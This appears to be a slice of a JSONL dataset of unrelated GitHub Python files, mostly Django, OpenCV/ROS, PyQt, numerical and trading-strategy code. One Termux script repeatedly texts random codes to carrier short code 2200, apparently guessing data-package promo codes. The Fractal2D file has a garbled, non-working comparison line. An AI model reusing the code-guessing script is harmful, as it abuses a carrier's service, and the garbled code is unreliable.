Influx!\"'\np = Popen(['osascript', '-'], stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)\nstdout, stderr = p.communicate(script)","repo_name":"AlexPerathoner/Anilist-watched-episodes","sub_path":"csvcreator.py","file_name":"csvcreator.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13082090359","text":"from django.db import models\n\nfrom accounts.models import CustomUser, Country\n\nSTATUS_CHOICES = (\n (False, 'Show only custom events'),\n (True, 'Show only official holidays events'),\n)\n\n\nclass Event(models.Model):\n user = models.ManyToManyField(\n CustomUser,\n related_name='custom_user_event',\n through='CustomUserEvent',\n blank=True\n )\n name = models.CharField(\n max_length=100,\n verbose_name='event_name'\n )\n start_datetime = models.DateTimeField(\n verbose_name='event_start_datetime'\n )\n end_datetime = models.DateTimeField(\n blank=True,\n verbose_name='event_end_datetime'\n )\n\n \"\"\"\n The value of next attribute is set by default by migration \n '0002_add_default_value_for_Notification.py'.\n It is necessary to create the first record in the database table \n \"\"\"\n\n notification = models.ForeignKey(\n 'Notification',\n on_delete=models.SET_DEFAULT,\n default=1,\n verbose_name='notification_event'\n )\n\n country_holiday = models.ForeignKey(\n Country,\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n related_name='country_event'\n )\n\n official_holiday = models.BooleanField(\n choices=STATUS_CHOICES,\n default=False,\n db_index=True\n )\n\n def save(self, *args, **kwargs):\n if not self.end_datetime:\n self.end_datetime = self.start_datetime.replace(\n hour=23,\n minute=59,\n second=00\n )\n super().save(*args, **kwargs)\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['name', 'start_datetime', 'end_datetime'],\n name='name_start_datetime_end_datetime_unique'),\n ]\n\n objects = models.Manager()\n\n\nclass CustomUserEvent(models.Model):\n user = models.ForeignKey(\n CustomUser,\n on_delete=models.CASCADE,\n related_name='custom_user_user_event'\n )\n event = models.ForeignKey(\n Event,\n on_delete=models.CASCADE,\n related_name='event_user_event'\n )\n subscription_status = models.BooleanField(\n default=False,\n db_index=True\n )\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'event'],\n name='user_event_unique'),\n ]\n\n objects = models.Manager()\n\n\nclass Notification(models.Model):\n description = models.CharField(\n max_length=80,\n verbose_name='notification_description'\n )\n value_time = models.PositiveIntegerField(\n blank=True,\n null=True,\n verbose_name='notification_value_time'\n )\n\n def __str__(self):\n if self.value_time is None:\n return '---'\n return str(self.description)\n\n objects = models.Manager()\n","repo_name":"SergeyMikulenko/training_project_2_calendar","sub_path":"events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20551787264","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport rospy\nfrom std_msgs.msg import Float64MultiArray\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nglobal bridge, cvImage\nbridge = CvBridge()\n\ndef image_callback(data):\n global bridge, cvImage\n try:\n cvImage = bridge.imgmsg_to_cv2(data,\"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n\n# Capture the input frame from webcam\n\n\n # Resize the input frame\n #frame = cv2.resize(frame, None, fx=scaling_factor,fy=scaling_factor, interpolation=cv2.INTER_AREA)\n\n\nif __name__=='__main__':\n global cvImage\n imageArray = Float64MultiArray()\n imageArray.data = [0,0,0,0]\n rospy.init_node('c1_pixelCoordinates', anonymous=True)\n rospy.Subscriber(\"/camera_array1/cam1/image_raw\", Image, image_callback)\n pub = rospy.Publisher('c1_pixelCoordinates', Float64MultiArray, queue_size=1)\n rate = rospy.Rate(10) \n\n # Iterate until the user presses ESC key\n frame_count = 0\n pixelCoords = np.zeros((1,2))\n scaling_factor = 0.5\n while not rospy.is_shutdown():\n try:\n frame = cvImage\n # Capture frame-by-frame\n #ret, frame = cap.read()\n frame = cv2.resize(frame, None, fx=scaling_factor,\n fy=scaling_factor, interpolation=cv2.INTER_AREA)\n # Convert the HSV colorspace\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n \n mask = cv2.inRange(hsv,np.array([0,150,150]),np.array([30,255,255]))\n \n # Bitwise-AND mask and original image\n res = cv2.bitwise_and(frame, frame, mask=mask)\n res = cv2.medianBlur(res, 5)\n \n\n _, contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n \n areas = [cv2.contourArea(c) for c in contours]\n if len(contours) > 0:\n max_index = np.argmax(areas)\n myBox = contours[max_index]\n x,y,w,h = cv2.boundingRect(myBox)\n #print(cv2.boundingRect(myBox))\n \n cv2.rectangle(frame,(x,y),(x+w,y+h), (0,0,255),1)\n \n\n #PIXEL COORDINATES OF OBJECT!!!\n \n pixelCoords = np.concatenate((pixelCoords,np.array([[x+0.5*w, y + 0.5*h]])))\n #print(pixelCoords[frame_count])\n x_Coord = x+0.5*w\n y_Coord = y+0.5*h\n area = w*h\n pixelTime = float(str(rospy.Time.now()))\n \n #print(\"X Pos: \" + str(x_Coord) + \" Y Pos: \" + str(y_Coord) + \" Area: \" + str(area))\n\n imageArray.data = [pixelTime, x_Coord, y_Coord, area]\n pub.publish(imageArray)\n \n frame_count += 1\n\n\n cv2.imshow('Original image', frame)\n cv2.imshow('Color Detector', res)\n \n c = cv2.waitKey(5)\n if c == 27:\n break\n except:\n print(\"error..waiting on camera\")\n cv2.destroyAllWindows()\ncv2.destroyAllWindows()\n","repo_name":"westpoint-robotics/ee489_pixel_to_gps","sub_path":"image_tracker/src/cam1_object_tracking.py","file_name":"cam1_object_tracking.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72962895235","text":"import numpy as np\nimport matplotlib.pyplot as mpl\nimport scipy as sp\nimport timeit as ti\nimport matplotlib as mp\n\nclass Fractal2D:\n def __init__(self, fcn , jacob=None):\n \"\"\"\n Parameters\n ----------\n fcn : Function\n The function which is to be evaluated. This must give its output in \n an array, length 2. \n\n Returns\n -------\n None.\n\n \"\"\"\n self.fcn = fcn\n self.jacob=jacob\n self.zeroes = [np.NaN]\n \n def Jacobean(self, X: np.array, h=1.e-5):\n \"\"\"\n Parameters\n ----------\n X: array\n the point at which the Jacobean is evaluated\n\n Returns\n -------\n Jac : array,\n 2 by 2 array giving the Jacobean. \n\n \"\"\"\n x1=X[0]\n x2= X[1]\n \n d1= (self.fcn(np.array([x1+h,x2]))-self.fcn(X))/h\n d2= (self.fcn(np.array([x1,x2+h]))-self.fcn(X))/h\n \n \n Jac= np.array( [[d1[0],d2[0]],\n [d1[1],d2[1]]])\n return Jac\n \n def NewtonMethod(self, X0: np.array , tol=1.0e-8):\n \"\"\"\n \n\n Parameters\n ----------\n X0 : np.array\n Initial value\n tol : float, optional\n Error tolerance of the zero points. The default is 1.0e-12.\n\n Returns\n -------\n index : int\n returns 0 if it does not converge, elsewhise the number in list. \n 'hello ' is the error message, which is here solely to indicate to ourselves that things have gone wrong. \n\n \"\"\"\n x=X0\n index='hello'\n for s in range(1000):\n jac= self.Jacobean(x)\n if np.linalg.det(jac)==0:\n index=f'zero {s}'\n break\n invjac= np.linalg.inv(jac)\n x_new = x - invjac @ self.fcn(x)\n x=x_new\n if np.abs(self.fcn(x)[0])1.e+5 or np.abs(self.fcn(x)[1])>1.e+5:\n index = 0\n break\n else:\n index=0\n return index\n \n def plot(self, N:int, ends: tuple):\n \"\"\"\n \n\n Parameters\n ----------\n N : int\n Resolution of the plot\n ends : tuple\n endpoints of plot, tuple of four values a,b,c,d\n\n Returns\n -------\n None.\n\n \"\"\"\n a,b,c,d=ends[0],ends[1],ends[2],ends[3]\n x_vals=np.linspace(a,b,num=N)\n y_vals=np.linspace(c,d,num=N)\n X,Y=np.meshgrid(x_vals, y_vals , indexing='ij', sparse=True)\n gah=[[[e,f]for f in y_vals] for e in x_vals]\n p=np.array(gah)\n A=np.array([[self.NewtonMethod(np.array([e,f]))for f in y_vals]for e in x_vals])\n #now I have the matrix, and I thus need to colour it. wish me luck. \n mpl.figure()\n mpl.pcolor(A)\n \n ","repo_name":"Dod12/newton-method","sub_path":"Al version/fp_aux.py","file_name":"fp_aux.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6236115672","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0020_test'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserAvatar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('url', models.CharField(max_length=200, null=True)),\n ],\n ),\n migrations.DeleteModel(\n name='Test',\n ),\n migrations.RemoveField(\n model_name='users',\n name='Img',\n ),\n migrations.AddField(\n model_name='useravatar',\n name='user',\n field=models.OneToOneField(to=settings.AUTH_USER_MODEL),\n ),\n ]\n","repo_name":"moment-x/web","sub_path":"webapp2/users/migrations/0021_auto_20150803_0750.py","file_name":"0021_auto_20150803_0750.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73301888833","text":"import csv\nimport urllib.request\n\nrow_names = ['movieId','posterUrl']\nwith open('movies.csv', 'r', newline='') as in_csv:\n reader = csv.DictReader(in_csv, fieldnames=row_names, delimiter=',')\n for row in reader:\n movieId = row['movieId']\n posterUrl = row['posterUrl']\n extension = '.jpg'\n filename = 'img/' + movieId + extension\n try:\n with urllib.request.urlopen(posterUrl) as response:\n with open(filename, 'wb') as out_image:\n out_image.write(response.read())\n except:\n with open('movies_to_delete.csv', 'a', newline='') as out_csv:\n writer = csv.writer(out_csv, delimiter=',')\n writer.writerow([movieId])","repo_name":"xhuliodo/couch-potatoes","sub_path":"dataset/06-download-poster-pics/movie_poster.py","file_name":"movie_poster.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6359349957","text":"import subprocess\nimport random\nimport string\n\n\n# Kullanıcıdan kaç kere tekrar edileceğini sor\ntekrar_sayisi = int(input(\"Kaç kere tekrar edilsin? \"))\n\n# Belirtilen sayıda tekrar edilen döngü\nfor i in range(tekrar_sayisi):\n # rasgele 7 karakterli bir dize oluştur\n letters = string.ascii_uppercase\n sms = ( ''.join(random.choice(letters) for i in range(7)) )\n smsmessage = (\"BAGLAN4GB \" + sms)\n # Use Subprocess Run Function to send SMS\n subprocess.run([\"termux-sms-send\", \"-n\", \"2200\", \"-s\", \"1\", smsmessage])\n # Print confirmation of each send\n print(smsmessage)\n","repo_name":"Teknoist/Random-Sms-Termux","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9756682700","text":"\n__MIDINR_OFFSET__ = 21\n\n\nclass ScaleNotSetException(Exception):\n pass\n\n\nclass Interval:\n def __init__(self, index=None, scale=None, midinr=None, register=None):\n if not index and not scale:\n raise ScaleNotSetException(\"No index or scale passed to constructor.\")\n\n if type(index) == Interval:\n self.index = index.index\n else:\n self.index = index\n self.scale = scale\n self.midinr = midinr\n self.register = register\n\n from pymusic.lang.scale.modern import ionian, aeolian\n self.major = ionian\n self.minor = aeolian\n\n if index and scale and register:\n midinr = 0\n for c in range(index - 1):\n midinr += scale[c]\n self.midinr = (__MIDINR_OFFSET__ + (12 * register)) + midinr\n elif scale and midinr and not index:\n normalized = (midinr - __MIDINR_OFFSET__) % 12\n index = val = 0\n while val < normalized:\n val += scale[index]\n index += 1\n self.index = index\n\n def is_perfect(self):\n if self.scale is None:\n raise ScaleNotSetException(\"Cannot determine if the interval is perfect if it hasn't a scale set.\")\n\n i = 0\n step_sum = sum(self.scale[:self.index-1])\n while i <= step_sum:\n for r in [5, 2, 5]:\n if step_sum == i:\n return True\n i += r\n return False\n\n def is_minor(self):\n if self.index not in [2, 3, 6, 7]:\n return False\n step_sum1 = sum(self.scale[:self.index-1])\n step_sum2 = sum(self.minor[:self.index-1])\n return step_sum1 == step_sum2\n\n def is_major(self):\n if self.index not in [2, 3, 6, 7]:\n return False\n step_sum1 = sum(self.scale[:self.index - 1])\n step_sum2 = sum(self.major[:self.index - 1])\n return step_sum1 == step_sum2\n\n def is_diminished(self):\n step_sum1 = sum(self.scale[:self.index - 1])\n step_sum2 = sum(self.minor[:self.index - 1]) - 1\n return step_sum1 == step_sum2\n\n def is_augmented(self):\n step_sum1 = sum(self.scale[:self.index - 1])\n step_sum2 = sum(self.major[:self.index - 1]) + 1\n return step_sum1 == step_sum2\n\n\ndef intervals(size=8):\n return [Interval(index=x) for x in range(1, size+1)]\n\n\nprimus, secundo, tertius, quartus, quinto, sexta, septimo, octava = intervals()\n","repo_name":"MacLotsen/PyMusic","sub_path":"pymusic/lang/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15397569656","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 策略代码总共分为三大部分,1)PARAMS变量 2)intialize函数 3)handle_data函数\n# 请根据指示阅读。或者直接点击运行回测按钮,进行测试,查看策略效果。\n\n# 策略名称:价值平均定投策略\n# 关键词:长期投资、高抛低吸、分批建仓。\n# 方法:\n# 1)确定每个周期的目标仓位;\n# 2)每一期将仓位调整至目标仓位;\n\n\n# 阅读1,首次阅读可跳过:\n# PARAMS用于设定程序参数,回测的起始时间、结束时间、滑点误差、初始资金和持仓。\n# 可以仿照格式修改,基本都能运行。如果想了解详情请参考新手学堂的API文档。\nPARAMS = {\n \"start_time\": \"2015-01-01 00:00:00\",\n \"end_time\": \"2016-09-01 00:00:00\",\n \"slippage\": 0.00001,\n \"account_initial\": {\"huobi_cny_cash\": 60000,\n \"huobi_cny_btc\": 0},\n}\n\n\n# 阅读2,遇到不明白的变量可以跳过,需要的时候回来查阅:\n# initialize函数是两大核心函数之一(另一个是handle_data),用于初始化策略变量。\n# 策略变量包含:必填变量,以及非必填(用户自己方便使用)的变量\ndef initialize(context):\n # 以日为单位进行回测\n context.frequency = \"1d\"\n # 设定以比特币为基准\n context.benchmark = \"huobi_cny_btc\"\n # 设定操作的标的为比特币\n context.security = \"huobi_cny_btc\"\n\n # 设置策略参数\n # 每个frequency的持仓总值的增长金额\n context.user_data.pos_value_growth_per_period = 100\n # 记录下当前处于第几个投资周期\n context.user_data.invest_period_count = 0\n # 设置策略期望初始仓位\n context.user_data.initial_pos_value = 0\n\n\n# 阅读3,策略核心逻辑:\n# handle_data函数定义了策略的执行逻辑,按照frequency生成的bar依次读取并执行策略逻辑,直至程序结束。\n# handle_data和bar的详细说明,请参考新手学堂的解释文档。\ndef handle_data(context):\n # 取得最新价格\n latest_close_price = context.data.get_current_price(context.security)\n # 计算当前实时仓位\n current_pos_value = getattr(context.account, context.security) * latest_close_price\n\n if context.user_data.initial_pos_value is None:\n context.user_data.initial_pos_value = current_pos_value\n\n # 计算当前期望仓位\n expected_pos_value = context.user_data.initial_pos_value + context.user_data.pos_value_growth_per_period * (\n context.user_data.invest_period_count + 1)\n # 当前账户持有的人民币现金\n current_cash_pos = context.account.huobi_cny_cash\n # 当前账户持有的数字货币数量\n current_sec_pos = getattr(context.account, context.security)\n # 计算本期需要投入的资金(若为负,则是撤回的资金)\n cash_to_spent = cash_to_spent_fn(context, expected_pos_value, current_pos_value, current_cash_pos, current_sec_pos,\n latest_close_price)\n context.log.info(\"本期需要投入的现金:%f元\" % cash_to_spent)\n\n # 更新投资周期至下一期\n context.user_data.invest_period_count += 1\n\n if cash_to_spent > 0:\n # 需要加仓,市价单买入\n context.log.info(\"正在买入%s\" % context.security)\n context.log.info(\"下单金额为 %s 元\" % round(cash_to_spent, 2))\n context.order.buy(context.security, cash_amount=str(cash_to_spent))\n else:\n # 需要减仓,计算需要卖出的数量,市价单卖出\n quantity = min(getattr(context.account, context.security), -1 * cash_to_spent / latest_close_price)\n context.log.info(\"正在卖出 %s\" % context.security)\n context.log.info(\"卖出数量为 %s\" % round(quantity))\n context.order.sell(context.security, quantity=str(quantity))\n\n\n# # 用户自定义的函数,可以被handle_data调用:计算每一个frequency需要买入/卖出的金额(正为买入,负为卖出)\ndef cash_to_spent_fn(context, expected_pos_value, current_pos_value, current_cash_pos, current_sec_pos,\n latest_close_price):\n # 低于目标仓位,需要买入加仓\n if expected_pos_value > current_pos_value:\n result = expected_pos_value - current_pos_value\n if result < current_cash_pos:\n return result\n else: # 现金不足,投入全部现金加仓\n context.log.warn(\n \"现金不足以满足目标仓位, 需要现金:%.2f, 现有现金:%.2f. 本次将用完全部现金\" % (result, current_cash_pos))\n return current_cash_pos\n else: # 当前仓位高于目标仓位,需要卖出减仓\n result = current_pos_value - expected_pos_value\n pos_qty_to_sell = result / latest_close_price\n if pos_qty_to_sell < current_sec_pos:\n return -1 * result\n else: # 仓位不足,卖出全部仓位\n context.log.warn(\n \"现有仓位不足以满足目标仓位, 需要卖出仓位:%.2f, 现有仓位:%.2f. 本次将卖出所有仓位\" % (pos_qty_to_sell, current_sec_pos))\n return -1 * latest_close_price * current_sec_pos\n","repo_name":"wequant-org/liveStrategyEngine","sub_path":"userStrategy/FixedPosValueGrowth.py","file_name":"FixedPosValueGrowth.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"zh","doc_type":"code","stars":612,"dataset":"github-code","pt":"61"} +{"seq_id":"12813184442","text":"from django.urls import path,include\nfrom . import views\nfrom .allDate import del_,insert_,update_\n\nurlpatterns = [\n path('', views.index,name='Index'),\n path('login/',views.login,name='Login'),\n path('update/', update_.update_, name='update'),\n path('del/', del_.del_, name='del'),\n path('splist/',views.splist,name='splist'),\n path('insert/', insert_.insert_, name='Insert'),\n]","repo_name":"blk1111/testweb","sub_path":"wweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17199689499","text":"# PyQt lib\nfrom PyQt5.QtWidgets import (QTimeEdit,QDateTimeEdit , QGridLayout, QHBoxLayout, QPushButton,\n QVBoxLayout,QWidget,QLCDNumber,QListWidget,QListWidgetItem,QFormLayout, QMessageBox)\nfrom PyQt5.QtCore import (QTime, QDateTime, QDate ,pyqtSignal, Qt)\n#py lib\nimport time\nimport threading\nimport pickle\nimport pdb\nimport queue\nimport numpy\n# view\nfrom view.pdfcreater import PdfCreater\nfrom view.reportDialog import ReportDialog\nfrom view.ticker import Ticker\nfrom view.historylist import HistoryList\n#UI\nfrom UI.recordUI import Ui_Form as RecodUI\n#model\nfrom model.toolkit import WRpickle\nfrom model.singleton import PickContext\nfrom model.database import DataHand\n\n\nclass PowerRecord(QWidget,RecodUI):\n \"\"\"docstring for PowerRecord\"\"\"\n\n beginTimeSignal = pyqtSignal(object,object)\n sqlTableName = pyqtSignal(object)\n stopSavePower = pyqtSignal(object)\n timeStateSignal = pyqtSignal(object)\n logStateSignal = pyqtSignal(object)\n plotlist = pyqtSignal(object,object,object)\n # plotlistbegin = pyqtSignal(object)\n\n def __init__(self):\n super(PowerRecord, self).__init__()\n # self.wrpick = WRpickle('data\\\\reportLast.pickle')\n # self.pickContext = self.wrpick.loadPick()\n self.pickContext = PickContext()\n self.datahand = DataHand()\n self.startTime = 0\n self.stopTime = time.time()\n self.userID = ''\n self.powerData = queue.Queue()\n self.pick = list()\n self.itemShowNum = 4\n self.itemChangeStatus = False\n self.timeStepPause = False\n # self.pdfItem = dict()\n self.figGet = None\n self.timebegin = True\n # self.loadFile()\n self.UI_init()\n # self.plantlist()\n # with open('template.qss') as t:\n # self.setStyleSheet(t.read())\n # self.initItemText()\n # self.arg = arg\n # self.timer = QTimer()\n # self.timer.timeout.connect(self.update())\n # self.timer.start(100)\n\n def UI_init(self):\n # self.ui = RecodUI()\n self.setupUi(self)\n # pdb.set_trace()\n\n self.seButton = self.logButton\n self.seButton.buttonState = 'begin'\n self.seButton.clicked.connect(self.beginOendTime)\n # self.timeEdit = self.timeEdit\n self.timeEdit.setDisplayFormat(' s : hh : mm')\n # self.timeEdit.setDate(QDate(2000,10,10))\n # print(self.timeEdit.text())\n self.ticker.hide()\n self.ticker = Ticker()\n self.gridLayout.addWidget(self.ticker, 3, 1, 1, 1)\n # self.formLayout.setWidget(3, QFormLayout.FieldRole, self.ticker)\n self.ticker.start()\n self.ticker.timeOut.connect(self.tickerTimeOut)\n # self.ticker.setNumDigits(10)\n # self.ticker.display('00:00:00')\n self.historyEdit = HistoryList()\n self.gridLayout_2.addWidget(self.historyEdit, 1, 0, 1, 2)\n self.historyEdit.itemSelectedEmit.connect(self.itemSelectionChanged)\n self.historyEdit.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.printButton.clicked.connect(self.printReport)\n # self.stepEdit.setValidator(QValidator(0.01,1000))\n # self.historyEdit.setCurrentRow(1)\n # for x in range(0,self.itemShowNum):\n # item = QListWidgetItem()\n # self.historyEdit.addItem(item)\n # self.historyEdit.itemSelectionChanged.connect(self.itemSelect)\n # buttonarea = QVBoxLayout()\n # self.printButton = self.printButton\n\n # buttonarea.addWidget(self.seButton)\n # buttonarea.addWidget(self.timeEdit)\n # buttonarea.addWidget(self.printButton)\n # buttonarea.addStretch()\n # buttonarea.addWidget(self.ticker)\n # mainLayout = QGridLayout()\n # mainLayout.addWidget(self.historyEdit, 0,1)\n # mainLayout.addLayout(buttonarea, 0, 0)\n # self.setLayout(mainLayout)\n # self.setLayout(self)\n\n\n # def itemSelect(self):\n # self.itemText = self.historyEdit.currentItem().text()\n # self.itemNum = self.historyEdit.currentRow()\n # # print(self.itemNum)\n # pickget = self.pick[-self.itemNum-1]\n # self.startTimetic = pickget.get('begin')\n # self.printUserID = pickget.get('userID')\n # print('itemSelect:',self.itemNum, self.startTimetic,self.printUserID)\n # self.itemChangeStatus = True\n # # print(self.itemText)\n\n def itemSelectionChanged(self,item):\n print('getitem',item)\n #get nowtable\n self.tableName = item\n self.sqlTableName.emit(self.tableName)\n temp = item.split('US')\n self.userID = temp[1]\n self.timeTick = temp[2:]\n # self.NowContextGet()\n #get last log\n self.pickContext = PickContext()\n #get username\n self.pickContext['worker'] = self.userID\n #get plot from db\n plotdata = self.datahand.getTableData(self.tableName)\n time_ = []\n power = []\n for x in plotdata:\n time_.append(x[0])\n power.append(x[1])\n self.plotlist.emit(False,time_,power)\n #get calc report\n if time_:\n self.pickContext['timelong'] = str(int(time_[-1]-time_[0]))+'秒'\n self.pickContext['maxsignalpower'] = self.__Power2str(max(power))\n self.pickContext['minsingalpower'] = self.__Power2str(min(power))\n self.pickContext['averagesingalepower'] = self.__Power2str(numpy.mean(power))\n self.pickContext['powerstable'] = self.__Power2str(numpy.std(power))\n else:\n self.pickContext['timelong'] = '0'\n self.pickContext['maxsignalpower'] = '0'\n self.pickContext['minsingalpower'] = '0'\n self.pickContext['averagesingalepower'] = '0'\n self.pickContext['powerstable'] = '0'\n print('PowerRecord change')\n self.pickContext.save_pick_file()\n\n def printReport(self):\n # self.getDbdata()\n if self.figGet:\n self.figGet.savePlotFig()\n rep = ReportDialog(self)\n # print('rep',rep)\n rep.exec_()\n if rep.saveOrcancel == 'save':\n print('pickContext',self.pickContext.pickContext)\n printer = PdfCreater(self,)\n self.sqlTableName.connect(printer.getDBData)\n printer.saveToFile()\n # printer.savePdf()\n\n # if self.itemChangeStatus is False:\n # self.itemText = self.historyEdit.item(0).text()\n # print('print:',self.itemText)\n # self.pdfItem['']\n\n def getNowFig(self,fig):\n self.figGet = fig\n\n\n # def NowContextGet(self):\n\n\n # # def plotTable():\n # pass\n\n\n def beginOendTime(self):\n # self.ticker.run()\n if self.seButton.buttonState == 'begin':\n self.timeLong = self.timeEdit2time()\n # pdb.set_trace()\n print('stepEdit',self.stepEdit.text()[:-1])\n self.timeStep = int(self.stepEdit.text()[:-1])\n if self.timeLong < self.timeStep:\n QMessageBox.information(self, \"设置错误\",\"记录时长要比记录步长大\")\n return\n else:\n #记录起始时间\n self.beginTime = time.time()\n print('beginTime:',self.beginTime)\n self.beginTimeSignal.emit(self.beginTime, self.timeStep)\n self.stopSavePower.emit(True)\n self.ticker.startTick(self.timeLong)\n self.timeStateSignal.emit(self.timeLong)\n self.logStateSignal.emit(True)\n\n self.seButton.setText('停止')\n self.seButton.buttonState = 'stop'\n elif self.seButton.buttonState == 'stop':\n self.ticker.stopTick()\n self.seButton.setText('开始')\n self.seButton.buttonState = 'begin'\n self.stopSavePower.emit(False)\n\n # def isStartSave(self,):\n # if self.timeLong < int(self.stepEdit.text())\n # QMessageBox.information(self, \"设置错误\",\n # \"记录时长要比记录步长大\")\n # return False\n # return True\n\n def tickerTimeOut(self):\n print('time out')\n self.seButton.setText('开始')\n self.seButton.buttonState = 'begin'\n self.stopSavePower.emit(False)\n\n\n def timeEdit2time(self):\n timeStr = self.timeEdit.text()\n timeSplit = timeStr.split(':')\n date = int(timeSplit[0].strip())\n hour = int(timeSplit[1].strip())\n minute = int(timeSplit[2].strip())\n return ((date*24+hour)*60+minute)*60\n\n def update_GUI(self):\n self.update()\n\n###\n# interface\n###\n\n def getUserID(self):\n return self.userID\n\n def setUserID(self,userid):\n self.userID = userid\n\n def getPowerData(self):\n return self.powerData\n\n def setPowerData(self,data):\n self.powerData.put(data)\n\n\n\n def getDbdata(self):\n if self.itemChangeStatus is False:\n self.itemText = self.historyEdit.item(0).text()\n self.itemNum = 0\n pickget = self.pick[-self.itemNum-1]\n self.startTimetic = pickget.get('begin')\n self.printUserID = pickget.get('userID')\n print('num,pick:',self.itemNum, self.startTimetic)\n print('print:',self.itemText)\n localTime = self.startTimetic\n username = self.userID\n localTime = str(int(localTime))\n tableName='TM'+localTime+'US'+username\n self.sqlTableName.emit(tableName)\n\n def timerSave(self):\n beginTime =self.beginTime\n continueTime = self.editTime\n self.pick.append({'begin':beginTime,\n 'continue':continueTime,'userID':self.userID})\n self.saveFile()\n self.loadFile()\n self.plantlist()\n\n self.stopTime = time.time()\n self.seButton.setEnabled(True)\n self.stopSavePower.emit(False)\n # self.seButton.setText('start')\n # self.timebegin = False\n\n def loadFile(self):\n try:\n with open('data\\\\usertask.pickle','rb') as f:\n self.pick = pickle.load(f)\n f.close()\n except FileNotFoundError:\n newfile = open('data\\\\usertask.pickle','wb')\n self.pick = list()\n pickle.dump(self.pick,newfile)\n newfile.close()\n # self.loadFile()\n except EOFError :\n pass\n\n except Exception as e:\n raise e\n\n def saveFile(self):\n try:\n with open('data\\\\usertask.pickle','wb') as f:\n pickle.dump(self.pick,f)\n f.close()\n except Exception as e:\n raise e\n\n def plantlist(self):\n if len(self.pick) < self.itemShowNum:\n textlist = self.pick\n else:\n textlist = self.pick[-self.itemShowNum:]\n for i,x in enumerate(textlist):\n if x.get('start',False) is not False:\n pass\n starttime = time.strftime('%H:%M:%S',time.localtime(x.get('start')))\n stoptime = time.strftime('%H:%M:%S',time.localtime(x.get('stop')))\n textstr = 'start:'+starttime+', stop:'+stoptime+', user:'+x.get('userID')\n elif x.get('begin',False) is not False:\n begin = time.strftime('%H:%M:%S',time.localtime(x.get('begin')))\n con = x.get('continue').toString()\n textstr = 'begin:' + begin + ', cont:' + con + ', user:'+x.get('userID')\n if i < self.itemShowNum:\n item = self.historyEdit.item(self.itemShowNum-i-1)\n item.setText(textstr)\n\n def __Power2str(self,data):\n if data > 0.1:\n return str(round(data,2))+'W'\n else:\n return str(round(data*1000,2)) + 'mW'\n\n # pdb.set_trace()\n # self.itemSelect()\n # self.timeEdit.setMaximumTime()\n # self.hourlabel = QLabel('时')\n # self.hourShow = QLCDNumber()\n # self.minlabel = QLabel('分')\n # self.minShow = QLCDNumber()\n # self.seclabel = QLabel('秒')\n\n # item.setText('kklong')\n # item = QListWidgetItem()\n # self.historyEdit.addItem(item)\n # item = QListWidgetItem()\n # self.historyEdit.addItem(item)\n # self.historyEdit.setReadOnly(True)\n # timebox = QHBoxLayout()\n\n # timebox.addWidget(self.hourlabel)\n # timebox.addWidget(self.hourShow)\n # timebox.addWidget(self.minlabel)\n # timebox.addWidget(self.minShow)\n # timebox.addWidget(self.seclabel)\n\n # self.printButton.clicked.connect(self.getDbdata)\n\n # timebox.addWidget()\n\n # mainLayout.addWidget(, 0, 0)\n # mainLayout.addLayout(timebox, 2, 0)\n\n # mainLayout.addLayout(buttonLayout2, 2, 1)\n # self.loadFile()\n\n # self.setWindowTitle(\"Simple Address Book\")\n\n # def timerStep(self):\n # threadStartTime = time.clock()\n # while self.timebegin:\n # timeStep = time.clock() - threadStartTime\n # gmTimeStep = time.localtime(timeStep)\n # # print(timeStep)\n # timestr = time.strftime('%H:%M:%S', gmTimeStep)\n # # print(timestr)\n # if self.editTime:\n # # pdb.set_trace()\n # nowQtime = QTime(gmTimeStep.tm_hour,gmTimeStep.tm_min)\n # if (self.editTime.minute() == nowQtime.minute())\\\n # and (self.editTime.hour() == nowQtime.hour()):\n # print('timeget')\n # self.timerSave()\n # self.timeStepPause = True\n # if self.timeStepPause is True:\n # threadStartTime = time.clock()\n # # print('st:',self.editTime,':',nowQtime)\n # self.ticker.display(timestr)\n # self.update_GUI()\n # time.sleep(0.3)\n\n\n\n\n # def startOrStop(self):\n # buttonState = self.seButton.text()\n # 